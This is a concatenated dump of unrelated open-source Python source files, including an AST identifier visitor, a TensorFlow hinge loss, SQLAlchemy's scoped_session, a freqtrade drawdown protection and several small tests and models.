# in the case of a clause like "x=x+5" (x is undeclared)
self.visit(node.value)
in_a = self.in_assign_targets
self.in_assign_targets = True
for n in node.targets:
self.visit(n)
self.in_assign_targets = in_a
if util.py3k:
# ExceptHandler is in Python 2, but this
# block only works in Python 3 (and is required there)
def visit_ExceptHandler(self, node):
if node.name is not None:
self._add_declared(node.name)
if node.type is not None:
self.listener.undeclared_identifiers.add(node.type.id)
for statement in node.body:
self.visit(statement)
def visit_FunctionDef(self, node):
self._add_declared(node.name)
# push function state onto stack. dont log any
# more identifiers as "declared" until outside of the function,
# but keep logging identifiers as "undeclared".
# track argument names in each function header so they arent counted as "undeclared"
saved = {}
inf = self.in_function
self.in_function = True
for arg in node.args.args:
if arg_id(arg) in self.local_ident_stack:
saved[arg_id(arg)] = True
else:
self.local_ident_stack[arg_id(arg)] = True
for n in node.body:
self.visit(n)
self.in_function = inf
for arg in node.args.args:
if arg_id(arg) not in saved:
del self.local_ident_stack[arg_id(arg)]
def visit_For(self, node):
# flip around visit
self.visit(node.iter)
self.visit(node.target)
for statement in node.body:
self.visit(statement)
for statement in node.orelse:
self.visit(statement)
def visit_Name(self, node):
if isinstance(node.ctx, _ast.Store):
self._add_declared(node.id)
if node.id not in reserved and \
node.id not in self.listener.declared_identifiers and \
node.id not in self.local_ident_stack:
self.listener.undeclared_identifiers.add(node.id)
def visit_Import(self, node):
for name in node.names:
if name.asname is not None:
self._add_declared(name.asname)
else:
self._add_declared(name.name.split('.')[0])
def visit_ImportFrom(self, node):
for name in node.names:
if name.asname is not None:
self._add_declared(name.asname)
else:
if name.name == '*':
raise exceptions.CompileException("'import *' is not supported, since all identifier names must be explicitly declared. Please use the form 'from <modulename> import <name1>, <name2>, ...' instead.", **self.exception_kwargs)
self._add_declared(name.name)
class FindTuple(_ast_util.NodeVisitor):
def __init__(self, listener, code_factory, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
self.code_factory = code_factory
def visit_Tuple(self, node):
for n in node.elts:
p = self.code_factory(n, **self.exception_kwargs)
self.listener.codeargs.append(p)
self.listener.args.append(ExpressionGenerator(n).value())
self.listener.declared_identifiers = self.listener.declared_identifiers.union(p.declared_identifiers)
self.listener.undeclared_identifiers = self.listener.undeclared_identifiers.union(p.undeclared_identifiers)
class ParseFunc(_ast_util.NodeVisitor):
def __init__(self, listener, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
def visit_FunctionDef(self, node):
self.listener.funcname = node.name
argnames = [arg_id(arg) for arg in node.args.args]
if node.args.vararg:
argnames.append(node.args.vararg)
if node.args.kwarg:
argnames.append(node.args.kwarg)
self.listener.argnames = argnames
self.listener.defaults = node.args.defaults # ast
self.listener.varargs = node.args.vararg
self.listener.kwargs = node.args.kwarg
class ExpressionGenerator(object):
def __init__(self, astnode):
self.generator = _ast_util.SourceGenerator(' ' * 4)
self.generator.visit(astnode)
def value(self):
return ''.join(self.generator.result)
else:
class FindIdentifiers(object):
def __init__(self, listener, **exception_kwargs):
self.in_function = False
self.local_ident_stack = {}
self.listener = listener
self.exception_kwargs = exception_kwargs
def _add_declared(self, name):
if not self.in_function:
self.listener.declared_identifiers.add(name)
def visitClass(self, node, *args):
self._add_declared(node.name)
def visitAssName(self, node, *args):
self._add_declared(node.name)
def visitAssign(self, node, *args):
# flip around the visiting of Assign so the expression gets evaluated first,
# in the case of a clause like "x=x+5" (x is undeclared)
self.visit(node.expr, *args)
for n in node.nodes:
self.visit(n, *args)
def visitFunction(self,node, *args):
self._add_declared(node.name)
# push function state onto stack. dont log any
# more identifiers as "declared" until outside of the function,
# but keep logging identifiers as "undeclared".
# track argument names in each function header so they arent counted as "undeclared"
saved = {}
inf = self.in_function
self.in_function = True
for arg in node.argnames:
if arg in self.local_ident_stack:
saved[arg] = True
else:
self.local_ident_stack[arg] = True
for n in node.getChildNodes():
self.visit(n, *args)
self.in_function = inf
for arg in node.argnames:
if arg not in saved:
del self.local_ident_stack[arg]
def visitFor(self, node, *args):
# flip around visit
self.visit(node.list, *args)
self.visit(node.assign, *args)
self.visit(node.body, *args)
def visitName(self, node, *args):
if node.name not in reserved and node.name not in self.listener.declared_identifiers and node.name not in self.local_ident_stack:
self.listener.undeclared_identifiers.add(node.name)
def visitImport(self, node, *args):
for (mod, alias) in node.names:
if alias is not None:
self._add_declared(alias)
else:
self._add_declared(mod.split('.')[0])
def visitFrom(self, node, *args):
for (mod, alias) in node.names:
if alias is not None:
self._add_declared(alias)
else:
if mod == '*':
raise exceptions.CompileException("'import *' is not supported, since all identifier names must be explicitly declared. Please use the form 'from <modulename> import <name1>, <name2>, ...' instead.", **self.exception_kwargs)
self._add_declared(mod)
def visit(self, expr):
visitor.walk(expr, self) #, walker=walker())
class FindTuple(object):
def __init__(self, listener, code_factory, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
self.code_factory = code_factory
def visitTuple(self, node, *args):
for n in node.nodes:
p = self.code_factory(n, **self.exception_kwargs)
self.listener.codeargs.append(p)
self.listener.args.append(ExpressionGenerator(n).value())
self.listener.declared_identifiers = self.listener.declared_identifiers.union(p.declared_identifiers)
self.listener.undeclared_identifiers = self.listener.undeclared_identifiers.union(p.undeclared_identifiers)
def visit(self, expr):
visitor.walk(expr, self) #, walker=walker())
class ParseFunc(object):
def __init__(self, listener, **exception_kwargs):
self.listener = listener
self.exception_kwargs = exception_kwargs
def visitFunction(self, node, *args):
self.listener.funcname = node.name
self.listener.argnames = node.argnames
self.listener.defaults = node.defaults
self.listener.varargs = node.varargs
self.listener.kwargs = node.kwargs
def visit(self, expr):
visitor.walk(expr, self)
class ExpressionGenerator(object):
"""given an AST node, generates an equivalent literal Python expression."""
def __init__(self, astnode):
self.buf = StringIO()
visitor.walk(astnode, self) #, walker=walker())
def value(self):
return self.buf.getvalue()
def operator(self, op, node, *args):
self.buf.write("(")
self.visit(node.left, *args)
self.buf.write(" %s " % op)
self.visit(node.right, *args)
self.buf.write(")")
def booleanop(self, op, node, *args):
self.visit(node.nodes[0])
for n in node.nodes[1:]:
self.buf.write(" " + op + " ")
self.visit(n, *args)
def visitConst(self, node, *args):
self.buf.write(repr(node.value))
def visitAssName(self, node, *args):
# TODO: figure out OP_ASSIGN, other OP_s
self.buf.write(node.name)
def visitName(self, node, *args):
self.buf.write(node.name)
def visitMul(self, node, *args):
self.operator("*", node, *args)
def visitAnd(self, node, *args):
self.booleanop("and", node, *args)
def visitOr(self, node, *args):
self.booleanop("or", node, *args)
def visitBitand(self, node, *args):
self.booleanop("&", node, *args)
def visitBitor(self, node, *args):
self.booleanop("|", node, *args)
def visitBitxor(self, node, *args):
self.booleanop("^", node, *args)
def visitAdd(self, node, *args):
self.operator("+", node, *args)
def visitGetattr(self, node, *args):
self.visit(node.expr, *args)
self.buf.write(".%s" % node.attrname)
def visitSub(self, node, *args):
self.operator("-", node, *args)
def visitNot(self, node, *args):
self.buf.write("not ")
self.visit(node.expr)
def visitDiv(self, node, *args):
self.operator("/", node, *args)
def visitFloorDiv(self, node, *args):
self.operator("//", node, *args)
def visitSubscript(self, node, *args):
self.visit(node.expr)
self.buf.write("[")
[self.visit(x) for x in node.subs]
self.buf.write("]")
def visitUnarySub(self, node, *args):
self.buf.write("-")
self.visit(node.expr)
def visitUnaryAdd(self, node, *args):
self.buf.write("-")
self.visit(node.expr)
def visitSlice(self, node, *args):
self.visit(node.expr)
self.buf.write("[")
if node.lower is not None:
self.visit(node.lower)
self.buf.write(":")
if node.upper is not None:
self.visit(node.upper)
self.buf.write("]")
def visitDict(self, node):
self.buf.write("{")
c = node.getChildren()
for i in range(0, len(c), 2):
self.visit(c[i])
self.buf.write(": ")
self.visit(c[i+1])
if i<len(c) -2:
self.buf.write(", ")
self.buf.write("}")
def visitTuple(self, node):
self.buf.write("(")
c = node.getChildren()
for i in range(0, len(c)):
self.visit(c[i])
if i<len(c) - 1:
self.buf.write(", ")
self.buf.write(")")
def visitList(self, node):
self.buf.write("[")
c = node.getChildren()
for i in range(0, len(c)):
self.visit(c[i])
if i<len(c) - 1:
self.buf.write(", ")
self.buf.write("]")
def visitListComp(self, node):
self.buf.write("[")
self.visit(node.expr)
self.buf.write(" ")
for n in node.quals:
self.visit(n)
self.buf.write("]")
def visitListCompFor(self, node):
self.buf.write(" for ")
self.visit(node.assign)
self.buf.write(" in ")
self.visit(node.list)
for n in node.ifs:
self.visit(n)
def visitListCompIf(self, node):
self.buf.write(" if ")
self.visit(node.test)
def visitCompare(self, node):
self.visit(node.expr)
for tup in node.ops:
self.buf.write(tup[0])
self.visit(tup[1])
def visitCallFunc(self, node, *args):
self.visit(node.node)
self.buf.write("(")
if len(node.args):
self.visit(node.args[0])
for a in node.args[1:]:
self.buf.write(", ")
self.visit(a)
self.buf.write(")")
class walker(visitor.ASTVisitor):
def dispatch(self, node, *args):
print "Node:", str(node)
#print "dir:", dir(node)
return visitor.ASTVisitor.dispatch(self, node, *args)
|
zuku1985/scikit-learn
|
refs/heads/master
|
sklearn/__check_build/setup.py
|
113
|
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
# License: BSD 3 clause
import numpy
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('__check_build', parent_package, top_path)
config.add_extension('_check_build',
sources=['_check_build.pyx'],
include_dirs=[numpy.get_include()])
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
samisalkosuo/pureapp
|
refs/heads/master
|
developerworks/simplejson/tests/test_default.py
|
149
|
from unittest import TestCase
import simplejson as json
class TestDefault(TestCase):
def test_default(self):
self.assertEqual(
json.dumps(type, default=repr),
json.dumps(repr(type)))
|
ishay2b/tensorflow
|
refs/heads/segnet
|
tensorflow/contrib/kernel_methods/python/losses.py
|
31
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of kernel-methods-related loss operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.losses import losses
def sparse_multiclass_hinge_loss(
labels,
logits,
weights=1.0,
scope=None,
loss_collection=ops.GraphKeys.LOSSES,
reduction=losses.Reduction.SUM_BY_NONZERO_WEIGHTS):
"""Adds Ops for computing the multiclass hinge loss.
The implementation is based on the following paper:
On the Algorithmic Implementation of Multiclass Kernel-based Vector Machines
by Crammer and Singer.
link: http://jmlr.csail.mit.edu/papers/volume2/crammer01a/crammer01a.pdf
This is a generalization of standard (binary) hinge loss. For a given instance
with correct label c*, the loss is given by:
loss = max_{c != c*} logits_c - logits_{c*} + 1.
or equivalently
loss = max_c { logits_c - logits_{c*} + I_{c != c*} }
where I_{c != c*} = 1 if c != c* and 0 otherwise.
Args:
labels: `Tensor` of shape [batch_size] or [batch_size, 1]. Corresponds to
the ground truth. Each entry must be an index in `[0, num_classes)`.
logits: `Tensor` of shape [batch_size, num_classes] corresponding to the
unscaled logits. Its dtype should be either `float32` or `float64`.
weights: Optional (python) scalar or `Tensor`. If a non-scalar `Tensor`, its
rank should be either 1 ([batch_size]) or 2 ([batch_size, 1]).
scope: The scope for the operations performed in computing the loss.
loss_collection: collection to which the loss will be added.
reduction: Type of reduction to apply to loss.
Returns:
Weighted loss float `Tensor`. If `reduction` is `NONE`, this has the same
shape as `labels`; otherwise, it is a scalar.
Raises:
ValueError: If `logits`, `labels` or `weights` have invalid or inconsistent
shapes.
ValueError: If `labels` tensor has invalid dtype.
"""
with ops.name_scope(scope, 'sparse_multiclass_hinge_loss', (logits,
labels)) as scope:
# Check logits Tensor has valid rank.
logits_shape = logits.get_shape()
logits_rank = logits_shape.ndims
if logits_rank != 2:
raise ValueError(
'logits should have rank 2 ([batch_size, num_classes]). Given rank is'
' {}'.format(logits_rank))
batch_size, num_classes = logits_shape[0].value, logits_shape[1].value
logits = math_ops.to_float(logits)
# Check labels have valid type.
if labels.dtype != dtypes.int32 and labels.dtype != dtypes.int64:
raise ValueError(
'Invalid dtype for labels: {}. Acceptable dtypes: int32 and int64'.
format(labels.dtype))
# Check labels and weights have valid ranks and are consistent.
labels_rank = labels.get_shape().ndims
if labels_rank not in [1, 2]:
raise ValueError(
'labels should have rank 1 ([batch_size]) or 2 ([batch_size, 1]). '
'Given rank is {}'.format(labels_rank))
with ops.control_dependencies([
check_ops.assert_less(labels, math_ops.cast(num_classes, labels.dtype))
]):
labels = array_ops.reshape(labels, shape=[-1])
weights = ops.convert_to_tensor(weights)
weights_rank = weights.get_shape().ndims
if weights_rank not in [0, 1, 2]:
raise ValueError(
'non-scalar weights should have rank 1 ([batch_size]) or 2 '
          '([batch_size, 1]). Given rank is {}'.format(weights_rank))
if weights_rank > 0:
weights = array_ops.reshape(weights, shape=[-1])
# Check weights and labels have the same number of elements.
weights.get_shape().assert_is_compatible_with(labels.get_shape())
# Compute the logits tensor corresponding to the correct class per instance.
example_indices = array_ops.reshape(
math_ops.range(batch_size), shape=[batch_size, 1])
indices = array_ops.concat(
[
example_indices,
array_ops.reshape(
math_ops.cast(labels, example_indices.dtype),
shape=[batch_size, 1])
],
axis=1)
label_logits = array_ops.reshape(
array_ops.gather_nd(params=logits, indices=indices),
shape=[batch_size, 1])
one_cold_labels = array_ops.one_hot(
indices=labels, depth=num_classes, on_value=0.0, off_value=1.0)
margin = logits - label_logits + one_cold_labels
margin = nn_ops.relu(margin)
loss = math_ops.reduce_max(margin, axis=1)
return losses.compute_weighted_loss(
loss, weights, scope, loss_collection, reduction=reduction)
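# A minimal usage sketch (shapes follow the docstring above; tensor values are
# illustrative only and assume the usual TF graph/session execution elsewhere):
# labels = ops.convert_to_tensor([0, 2], dtype=dtypes.int64)      # [batch_size]
# logits = ops.convert_to_tensor([[1.0, 0.2, -0.5],
#                                 [0.1, 0.3, 2.0]])               # [batch_size, num_classes]
# loss = sparse_multiclass_hinge_loss(labels=labels, logits=logits)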
|
esakellari/root
|
refs/heads/master
|
interpreter/llvm/src/tools/clang/bindings/python/tests/cindex/test_access_specifiers.py
|
82
|
from clang.cindex import AccessSpecifier
from clang.cindex import Cursor
from clang.cindex import TranslationUnit
from .util import get_cursor
from .util import get_tu
def test_access_specifiers():
"""Ensure that C++ access specifiers are available on cursors"""
tu = get_tu("""
class test_class {
public:
void public_member_function();
protected:
void protected_member_function();
private:
void private_member_function();
};
""", lang = 'cpp')
test_class = get_cursor(tu, "test_class")
    assert test_class.access_specifier == AccessSpecifier.INVALID
public = get_cursor(tu.cursor, "public_member_function")
assert public.access_specifier == AccessSpecifier.PUBLIC
protected = get_cursor(tu.cursor, "protected_member_function")
assert protected.access_specifier == AccessSpecifier.PROTECTED
private = get_cursor(tu.cursor, "private_member_function")
assert private.access_specifier == AccessSpecifier.PRIVATE
|
edxzw/edx-platform
|
refs/heads/master
|
common/djangoapps/xblock_django/migrations/0001_initial.py
|
62
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='XBlockDisableConfig',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled', models.BooleanField(default=False, verbose_name='Enabled')),
('disabled_blocks', models.TextField(default=b'', help_text='Space-separated list of XBlocks which should not render.', blank=True)),
('changed_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='Changed by')),
],
options={
'ordering': ('-change_date',),
'abstract': False,
},
),
]
|
ChuckCottrill/CodeSamples
|
refs/heads/master
|
python/alexa-ai-test.py
|
1
|
'''
Prompt:
A circular definition is one that uses the term being defined as part of the definition.
For example, define
“oak” : “a tree that grows from an acorn”
“acorn” : “the nut produced by an oak tree”.
acorn = nut, produced, oak-tree
acorn -> nut -> oak -> acorn
acorn -> tree -> nut -> oak -> acorn
Task: Given a dictionary, identify all of the circular definitions.
'''
non_important = ['the', 'a', 'an']  # etc.
def extract_important_words(definition):
    # Split the definition into words and drop articles / unimportant words.
    words = definition.lower().replace('.', ' ').replace(',', ' ').split()
    words = [w for w in words if w not in non_important]
    return words  # e.g. ['nut', 'produced', 'by', 'oak', 'tree']
# dictionary: mapping of word -> definition string.
# For every word, follow the important words of its definition and look for a
# path that leads back to the word itself.
def find_path(dictionary, root, word, path):
    # Depth-first walk over the definition graph, looking for a path back to root.
    frontier = extract_important_words(dictionary.get(word, ''))  # first level
    for element in frontier:
        if element == root:
            return path + [element]  # match: the definitions loop back to root
        if element in dictionary and element not in path:
            next_path = find_path(dictionary, root, element, path + [element])
            if next_path:
                return next_path
    return []
def find_circular(dictionary, word):
    # Return the cycle starting at word, or [] if its definition is not circular.
    found = find_path(dictionary, word, word, [word])
    if len(found) > 0:
        print("found", ' -> '.join(found))
    return found
def find_all_circular(dictionary):
    circular = {}
    for word in dictionary:
        found = find_circular(dictionary, word)
        if len(found) > 0:
            circular[word] = found
    return circular
# 1. e.g. 'oak -> acorn -> oak'
# 2. number of circular definitions: len(find_all_circular(dictionary))
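# A minimal sketch of how the helpers above might be exercised; the sample
# dictionary below is illustrative only (it mirrors the oak/acorn example from
# the prompt) and is not part of the original task data.
if __name__ == '__main__':
    sample = {
        'oak': 'a tree that grows from an acorn',
        'acorn': 'the nut produced by an oak tree',
        'nut': 'a hard-shelled fruit',
    }
    print(find_all_circular(sample))  # expect 'oak' and 'acorn' to be reported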
|
olivierdalang/stdm
|
refs/heads/master
|
third_party/sqlalchemy/orm/scoping.py
|
1
|
# orm/scoping.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .. import exc as sa_exc
from ..util import ScopedRegistry, ThreadLocalRegistry, warn
from . import class_mapper, exc as orm_exc
from .session import Session
__all__ = ['scoped_session']
class scoped_session(object):
"""Provides scoped management of :class:`.Session` objects.
See :ref:`unitofwork_contextual` for a tutorial.
"""
def __init__(self, session_factory, scopefunc=None):
"""Construct a new :class:`.scoped_session`.
:param session_factory: a factory to create new :class:`.Session`
instances. This is usually, but not necessarily, an instance
of :class:`.sessionmaker`.
:param scopefunc: optional function which defines
the current scope. If not passed, the :class:`.scoped_session`
object assumes "thread-local" scope, and will use
a Python ``threading.local()`` in order to maintain the current
:class:`.Session`. If passed, the function should return
a hashable token; this token will be used as the key in a
dictionary in order to store and retrieve the current
:class:`.Session`.
"""
self.session_factory = session_factory
if scopefunc:
self.registry = ScopedRegistry(session_factory, scopefunc)
else:
self.registry = ThreadLocalRegistry(session_factory)
def __call__(self, **kw):
"""Return the current :class:`.Session`, creating it
using the session factory if not present.
:param \**kw: Keyword arguments will be passed to the
session factory callable, if an existing :class:`.Session`
is not present. If the :class:`.Session` is present and
keyword arguments have been passed,
:exc:`~sqlalchemy.exc.InvalidRequestError` is raised.
"""
if kw:
scope = kw.pop('scope', False)
if scope is not None:
if self.registry.has():
raise sa_exc.InvalidRequestError(
"Scoped session is already present; "
"no new arguments may be specified.")
else:
sess = self.session_factory(**kw)
self.registry.set(sess)
return sess
else:
return self.session_factory(**kw)
else:
return self.registry()
def remove(self):
"""Dispose of the current :class:`.Session`, if present.
This will first call :meth:`.Session.close` method
on the current :class:`.Session`, which releases any existing
transactional/connection resources still being held; transactions
specifically are rolled back. The :class:`.Session` is then
discarded. Upon next usage within the same scope,
the :class:`.scoped_session` will produce a new
:class:`.Session` object.
"""
if self.registry.has():
self.registry().close()
self.registry.clear()
def configure(self, **kwargs):
"""reconfigure the :class:`.sessionmaker` used by this
:class:`.scoped_session`.
See :meth:`.sessionmaker.configure`.
"""
if self.registry.has():
warn('At least one scoped session is already present. '
' configure() can not affect sessions that have '
'already been created.')
self.session_factory.configure(**kwargs)
def query_property(self, query_cls=None):
"""return a class property which produces a :class:`.Query` object
against the class and the current :class:`.Session` when called.
e.g.::
Session = scoped_session(sessionmaker())
class MyClass(object):
query = Session.query_property()
# after mappers are defined
result = MyClass.query.filter(MyClass.name=='foo').all()
Produces instances of the session's configured query class by
default. To override and use a custom implementation, provide
a ``query_cls`` callable. The callable will be invoked with
the class's mapper as a positional argument and a session
keyword argument.
There is no limit to the number of query properties placed on
a class.
"""
class query(object):
def __get__(s, instance, owner):
try:
mapper = class_mapper(owner)
if mapper:
if query_cls:
# custom query class
return query_cls(mapper, session=self.registry())
else:
# session's configured query class
return self.registry().query(mapper)
except orm_exc.UnmappedClassError:
return None
return query()
ScopedSession = scoped_session
"""Old name for backwards compatibility."""
def instrument(name):
def do(self, *args, **kwargs):
return getattr(self.registry(), name)(*args, **kwargs)
return do
for meth in Session.public_methods:
setattr(scoped_session, meth, instrument(meth))
def makeprop(name):
def set(self, attr):
setattr(self.registry(), name, attr)
def get(self):
return getattr(self.registry(), name)
return property(get, set)
for prop in ('bind', 'dirty', 'deleted', 'new', 'identity_map',
'is_active', 'autoflush', 'no_autoflush', 'info'):
setattr(scoped_session, prop, makeprop(prop))
def clslevel(name):
def do(cls, *args, **kwargs):
return getattr(Session, name)(*args, **kwargs)
return classmethod(do)
for prop in ('close_all', 'object_session', 'identity_key'):
setattr(scoped_session, prop, clslevel(prop))
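# A minimal usage sketch (the engine URL below is illustrative only):
# from sqlalchemy import create_engine
# from sqlalchemy.orm import sessionmaker
# engine = create_engine('sqlite://')
# Session = scoped_session(sessionmaker(bind=engine))
# session = Session()   # returns the thread-local Session
# ...
# Session.remove()      # dispose of it at the end of the request/scope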
|
snamstorm/rockstor-core
|
refs/heads/master
|
src/rockstor/smart_manager/models/nfsd_uid_gid.py
|
8
|
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.db import models
from smart_manager.models import SProbe
class NFSDUidGidDistribution(models.Model):
"""
for a given ts and share, number and i/o size of various nfs calls
"""
rid = models.ForeignKey(SProbe)
ts = models.DateTimeField(db_index=True)
share = models.CharField(max_length=255)
client = models.CharField(max_length=100)
uid = models.IntegerField(default=0)
gid = models.IntegerField(default=0)
num_lookup = models.BigIntegerField(default=0)
num_read = models.BigIntegerField(default=0)
num_write = models.BigIntegerField(default=0)
num_create = models.BigIntegerField(default=0)
num_commit = models.BigIntegerField(default=0)
num_remove = models.BigIntegerField(default=0)
"""
sums are in KB
"""
sum_read = models.BigIntegerField(default=0)
sum_write = models.BigIntegerField(default=0)
class Meta:
app_label = 'smart_manager'
|
noslenfa/tdjangorest
|
refs/heads/master
|
uw/lib/python2.7/site-packages/django/contrib/localflavor/sk/forms.py
|
109
|
"""
Slovak-specific form helpers
"""
from __future__ import absolute_import, unicode_literals
from django.contrib.localflavor.sk.sk_districts import DISTRICT_CHOICES
from django.contrib.localflavor.sk.sk_regions import REGION_CHOICES
from django.forms.fields import Select, RegexField
from django.utils.translation import ugettext_lazy as _
class SKRegionSelect(Select):
"""
A select widget widget with list of Slovak regions as choices.
"""
def __init__(self, attrs=None):
super(SKRegionSelect, self).__init__(attrs, choices=REGION_CHOICES)
class SKDistrictSelect(Select):
"""
A select widget with list of Slovak districts as choices.
"""
def __init__(self, attrs=None):
super(SKDistrictSelect, self).__init__(attrs, choices=DISTRICT_CHOICES)
class SKPostalCodeField(RegexField):
"""
A form field that validates its input as Slovak postal code.
Valid form is XXXXX or XXX XX, where X represents integer.
"""
default_error_messages = {
'invalid': _('Enter a postal code in the format XXXXX or XXX XX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(SKPostalCodeField, self).__init__(r'^\d{5}$|^\d{3} \d{2}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
"""
Validates the input and returns a string that contains only numbers.
Returns an empty string for empty values.
"""
v = super(SKPostalCodeField, self).clean(value)
return v.replace(' ', '')
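# Hedged usage sketch, added for illustration only (not part of the original
# file): both accepted spellings normalise to the same five-digit string once
# clean() strips the space. The helper name and sample code are hypothetical.
def _example_postal_code_cleaning():
    field = SKPostalCodeField()
    assert field.clean('841 06') == '84106'
    assert field.clean('84106') == '84106'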
|
gcarq/freqtrade
|
refs/heads/develop
|
freqtrade/plugins/protections/max_drawdown_protection.py
|
1
|
import logging
from datetime import datetime, timedelta
from typing import Any, Dict
import pandas as pd
from freqtrade.data.btanalysis import calculate_max_drawdown
from freqtrade.persistence import Trade
from freqtrade.plugins.protections import IProtection, ProtectionReturn
logger = logging.getLogger(__name__)
class MaxDrawdown(IProtection):
has_global_stop: bool = True
has_local_stop: bool = False
def __init__(self, config: Dict[str, Any], protection_config: Dict[str, Any]) -> None:
super().__init__(config, protection_config)
self._trade_limit = protection_config.get('trade_limit', 1)
self._max_allowed_drawdown = protection_config.get('max_allowed_drawdown', 0.0)
# TODO: Implement checks to limit max_drawdown to sensible values
def short_desc(self) -> str:
"""
Short method description - used for startup-messages
"""
return (f"{self.name} - Max drawdown protection, stop trading if drawdown is > "
f"{self._max_allowed_drawdown} within {self.lookback_period_str}.")
def _reason(self, drawdown: float) -> str:
"""
LockReason to use
"""
return (f'{drawdown} > {self._max_allowed_drawdown} in {self.lookback_period_str}, '
f'locking for {self.stop_duration_str}.')
def _max_drawdown(self, date_now: datetime) -> ProtectionReturn:
"""
Evaluate recent trades for drawdown ...
"""
look_back_until = date_now - timedelta(minutes=self._lookback_period)
trades = Trade.get_trades_proxy(is_open=False, close_date=look_back_until)
trades_df = pd.DataFrame([trade.to_json() for trade in trades])
if len(trades) < self._trade_limit:
# Not enough trades in the relevant period
return False, None, None
# Drawdown is always positive
try:
drawdown, _, _ = calculate_max_drawdown(trades_df, value_col='close_profit')
except ValueError:
return False, None, None
if drawdown > self._max_allowed_drawdown:
self.log_once(
f"Trading stopped due to Max Drawdown {drawdown:.2f} < {self._max_allowed_drawdown}"
f" within {self.lookback_period_str}.", logger.info)
until = self.calculate_lock_end(trades, self._stop_duration)
return True, until, self._reason(drawdown)
return False, None, None
def global_stop(self, date_now: datetime) -> ProtectionReturn:
"""
Stops trading (position entering) for all pairs
This must evaluate to true for the whole period of the "cooldown period".
:return: Tuple of [bool, until, reason].
If true, all pairs will be locked with <reason> until <until>
"""
return self._max_drawdown(date_now)
def stop_per_pair(self, pair: str, date_now: datetime) -> ProtectionReturn:
"""
Stops trading (position entering) for this pair
This must evaluate to true for the whole period of the "cooldown period".
:return: Tuple of [bool, until, reason].
If true, this pair will be locked with <reason> until <until>
"""
return False, None, None
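# Hedged sketch, added for illustration only (not freqtrade's actual
# calculate_max_drawdown): the quantity the protection compares against
# max_allowed_drawdown is the largest fall of the cumulative close_profit
# curve from its running peak. The helper name and sample profits are made up.
def _example_max_drawdown(profits):
    """Return the largest peak-to-trough drop of the cumulative profit series."""
    cumulative = peak = worst = 0.0
    for profit in profits:
        cumulative += profit
        peak = max(peak, cumulative)
        worst = max(worst, peak - cumulative)
    return worst

# _example_max_drawdown([0.02, -0.05, 0.01, -0.03]) -> ~0.07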
|
badloop/SickRage
|
refs/heads/master
|
lib/guessit/transfo/guess_date.py
|
29
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2013 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function, unicode_literals
from guessit.containers import DefaultValidator
from guessit.plugins.transformers import Transformer
from guessit.matcher import GuessFinder
from guessit.date import search_date
class GuessDate(Transformer):
def __init__(self):
Transformer.__init__(self, 50)
def register_arguments(self, opts, naming_opts, output_opts, information_opts, webservice_opts, other_options):
naming_opts.add_argument('-Y', '--date-year-first', action='store_true', dest='date_year_first', default=None,
help='If short date is found, consider the first digits as the year.')
naming_opts.add_argument('-D', '--date-day-first', action='store_true', dest='date_day_first', default=None,
help='If short date is found, consider the second digits as the day.')
def supported_properties(self):
return ['date']
@staticmethod
def guess_date(string, node=None, options=None):
date, span = search_date(string, options.get('date_year_first') if options else False, options.get('date_day_first') if options else False)
if date and span and DefaultValidator.validate_string(string, span): # ensure we have a separator before and after date
return {'date': date}, span
return None, None
def process(self, mtree, options=None):
GuessFinder(self.guess_date, 1.0, self.log, options).process_nodes(mtree.unidentified_leaves())
|
TheMOOCAgency/edx-platform
|
refs/heads/master
|
